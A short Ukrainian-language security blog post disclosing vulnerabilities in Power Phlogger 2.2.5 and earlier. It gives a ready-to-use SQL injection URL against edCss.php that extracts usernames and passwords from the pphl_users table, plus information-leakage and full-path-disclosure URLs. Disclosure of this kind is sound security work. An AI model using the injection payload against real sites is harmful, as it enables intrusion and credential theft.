Websecurity - Веб безпека

До раніше мною оприлюднених уразливостей в Power Phlogger, повідомляю про нові уразливості в даній системі для ведення статистики відвідувань. Деякий час тому, 16.02.2008 та 31.05.2008, я виявив SQL Injection, Information Leakage та Full path disclosure уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

SQL Injection:

http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit

Information Leakage:

http://site/robots.txt

В robots.txt вказані важливі папки системи, що дозволяє знайти її ресурси та виявити інші Information Disclosure уразливості.

Full path disclosure:

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/modules/usercreate.php

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це п’ята частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

This entry was posted on 23:54 31.05.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.